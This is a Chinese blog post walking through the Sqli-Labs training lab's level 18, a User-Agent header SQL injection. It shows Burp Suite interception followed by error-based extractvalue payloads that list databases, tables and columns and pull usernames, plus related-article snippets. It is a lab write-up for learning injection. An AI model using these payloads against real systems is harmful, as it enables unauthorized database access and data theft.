Less-18 【User-Agent】

于 2023-05-20 14:08:58 发布
阅读量313 收藏 1
点赞数 1
分类专栏: Sqli-Labs 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45939134/article/details/130780945
版权

目录

第十八关

1、设置代理

查看BP的代理

查看浏览器代理

2、使用BP抓包

3、BP重放攻击

4、寻找注入点

5、分析报错信息

6、绕过User-Agent

7、异常报错

8、获取所有数据库名

9、获取当前数据库名

10、获取security数据库下的所有数据表

11、获取security数据库下users表中所有字段名

12、获取users表中username字段下第一个数据,以第0位为起点向后推进1位(不包括0)

第十八关

我们发现在不管那个文本框输入各种的符号都没有用。

这时候我们就可以分析它的HTTP请求包来进行攻击。

1、设置代理

查看BP的代理

查看浏览器代理

如果"例如:"后面的字不一致请做以下设置

在文本框中输入network.proxy.allow_hijacking_localhost然后把false改成true

2、使用BP抓包

切换到浏览器我们输入账号密码然后点击Submit,然后我们打开BP就会发现已经抓取的HTTP请求包。

3、BP重放攻击

我们按以下Ctrl+R键,然后点击Repeater查看我们传送过来的请求包

点击Go查看一下正常页面

4、寻找注入点

我们先试一下User-Agent,在它的最后加一个单引号看看。

5、分析报错信息

关键信息:'127.0.0.1','admin')'

分析它的闭合方式是('User-Agent','IP','Username')

6、绕过User-Agent

User-Agent: 1',1,1) -- +

7、异常报错

User-Agent只是一个特殊的字符串,所以我们去判断字段数,因为没有信息,所以提供报错。

这时候我们就可以使用异常报错的方式来获取我们想要的信息

8、获取所有数据库名

因为它报错回显的字符数量有限,所以我们需要更改1,32的1,以第1位开始往后32位的字符(其中包括第1位)

User-Agent: 1',1,extractvalue(1,concat(0x7e,substr((select binary(group_concat(schema_name)) from information_schema.schemata),1,32),0x7e))) -- +

9、获取当前数据库名

User-Agent: 1',1,extractvalue(1,concat(0x7e,(select database())))) -- +

10、获取security数据库下的所有数据表

User-Agent: 1',1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))) -- +

11、获取security数据库下users表中所有字段名

User-Agent: 1',1,extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e))) -- +

12、获取users表中username字段下第一个数据,以第0位为起点向后推进1位(不包括0)

User-Agent: 1',1,extractvalue(1,concat(0x7e,(select * from (select username from users limit 0,1) a),0x7e))) -- +

我们逐步去拿数据,其中可能会比较浪费时间,可以选择用sqlmap工具。

到此闯关完成,闯关结束。

'tubug'
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs Less -18—Less -22(sqli-labs闯关指南 18—22)--http头部注入相关
m0_54899775的博客
12-19 1427
sqli-labs Less -18—Less -22(sqli-labs闯关指南 18—22)--http头部注入相关 sqlilabs Less-18、Less-19、Less-20、Less-21、Less-22
Android代码-MaterialFBook
08-08
A light client for Facebook with a modern look (Material Design). ... Thanks JakeLane_ ...New user agent Version 1.3: Fab menu with better look (its blue like Facebook theme now). Better
Sqli-labs之Less-18和Less-19
→_→
04-12 3326
Less-18 基于错误的用户代理,头部POST注入 (注:这一个模拟的场景是注册登录后的注入) 由题意可知,这又是一种新姿势,老方法,查找注入点,发现前面的方法都未成功。且错误回显与正确回显都显示IP: 这里写说几个常用请求头:(上一篇文章详细讲过) Host ...
Less 18 (请求头注入--user-agent注入)
老司机开代码的博客
08-03 2498
文章目录1. 题目分析2. 构造SQL3. 注入过程4. 使用python进行注入 1. 题目分析 首先我们来分析一下题目: 经过尝试,我们知道,当我们输入正确的用户名和密码的时候,后台会将User Agent返回到屏幕上。 那么根据目前的情况来看,可能存在的注入点有2个: 登录框 user-agent 我们先来看一下源代码: // uagent的接收是未经过严格过滤的 $uagent = $_SERVER['HTTP_USER_AGENT']; $IP = $_SERVER['REMOTE_ADDR
sqli-labs ————less -18
Fly_鹏程万里
05-12 3771
Less-18源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
sqli-labs(less-18)
不知名白帽的博客
07-18 818
sqli-labs(less-18)。less-18(UA注入)
LESS-18~LESS~22
qq_44598397的博客
03-29 232
LESS-18 由于用户和密码都有check_input()处理,所以不能再用户和密码处进行注入,但是可以看出有insert语句insert="insertinto‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="insert into `security`.`uagents...
php.ini-development
05-08
user_ini.filename = ".user.ini" ; To disable this feature set this option to empty value ;user_ini.filename = ; TTL for user-defined php.ini files (time-to-live) in seconds. Default is 300 seconds ...
第十一节 HTTP头中的SQL注入-01
最新发布
09-15
攻击者可以构造带有恶意SQL语句的User-Agent值,如Sqli-Less 18中所示的Payload,通过`updatexml()`函数尝试执行数据库操作。这种注入方式可能在服务器端没有对User-Agent进行严格检查的情况下成功。 ### 3. ...
sqlilabs 75关中文目录
01-11
6. **标头和Cookie注入**:Less-18至Less-21讨论了如何利用HTTP标头(如User-Agent和Referer)和Cookie中的注入点,扩大了攻击面。 7. **注释符绕过**:Less-23展示了如何利用注释符来绕过过滤机制,继续注入。 8....
ZABBIX从入门到精通v3.0.1+-+运维生存时间(2016).pdf
07-24
zabbix自定义用户自定义用户keykey与参数与参数User parametersUser parameters ................................................................................................................................
SQL注入 Less18(头部注入+报错注入)
开心星人的博客
07-24 765
_SERVER是PHP预定义变量之一,可以直接使用,它是一个包含了诸如头信息(header)、路径(path)及脚本位置(scriptlocations)信息的数组。$_SERVER数组中的元素由Web服务器创建,但不能保证每个服务器都提供全部元素,有的服务器可能会忽略一些,或者提供一些没有在这里列举出来的元素。一个select查询语句,因为必须要$row1不为空,才可以进入下面的if,所以我们输入的uname和passwd都必须是正确存在的用户。check_input函数,...
SQLi LABS Less-18 报错注入
热门推荐
wangyuxiang946的博客
06-22 1万+
第十八关请求方式为 GET请求 , 注入点为User-Agent , 注入方式为 错误注入 第一步,判断注入方式 先看源码 后台代码对 特殊字符进行了过滤 , 常规的注入方式行不通 , 只有通过代码审计来判断注入方式 登录成功后 , 有一个保存用户主机信息的SQL语句 , 并且没有对参数进行过滤 , 我们可以针对这个SQL进行错误注入 真实场景中 , 我们可以先注册一个账号进行登录 , 登录成功后通过User-Agent 进行错误注入 , 从而实现脱库 使用 Burp...
sqli-labs-less-18、19、20、21、22
giun的博客
02-13 1394
先学习下http头部常见的一些关键字 Accept: 浏览器能够处理的内容类型 Accept-Charset: 浏览器能够显示的字符集 Accept-Encoding:浏览器能够处理的压缩编码。 Accept-Language: 浏览器当前设置的语言。 Connection:浏览器与服务器之间连接的类型 Cookie:当前页面设置的任何Cookie Host:发出请求的页面所在的域。 Refere...
sqli-labs Less18 原理到实现详解
m0_60829468的博客
10-29 748
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 系列文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前期知识储备 从18关开始考察的是头部注入(Header Injection - Uagent field - Error based),这里简述头部注入的点。
SQLi-LABS Less-18到Less-22 头部注入
m0_64898960的博客
04-24 636
Less-18题目 先抓包 由它题目可以知道,这是头部注入。其实我也并不知道头部注入这个姿势,刚好做这道题让我了解一下…在百度过后,头部注入的话已经不能在用户名以及密码那输入SQL语句了,只能通过抓包改包看回显了…这里使用你在Less-17改过的密码登录到admin页面。 由登录页面的回显可以知道我们需要改的是这个地方 需要使用“ ’ ”去闭合 爆数据库 无论使用updatexml还是extractvalue,需要注意的是,这里后面需要闭合,不能用注释符,不然会破坏insert语句的插入。 查表
基于Sqli-Labs靶场的SQL注入-17~22关
Joker
01-03 1683
这一篇博客我主要讲了HTTP头部注入中的 UA、Referer、Cookie 注入以及 base-64编码。
sqli-labs(18-23关)
cuddlylm的博客
04-07 1034
less-18User-Agent注入) 登录失败显示ip地址 登录成功显示ip地址和User-Agent 在username和password处尝试注入均被转义,无法注入 测试的关键利用注入语句为 $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"; 因为uagents的数据是会写入数据库再输出的,这是我们得以成功注入的关键 分
安装less-loader 和less
09-08
安装less-loader和less的步骤如下: 1. 确定你正在使用的webpack版本。根据webpack的版本选择合适的less-loader版本。例如,如果你使用的是webpack@4,那么可以选择less-loader@5~7版本。 2. 打开命令行终端,运行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

'tubug'

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值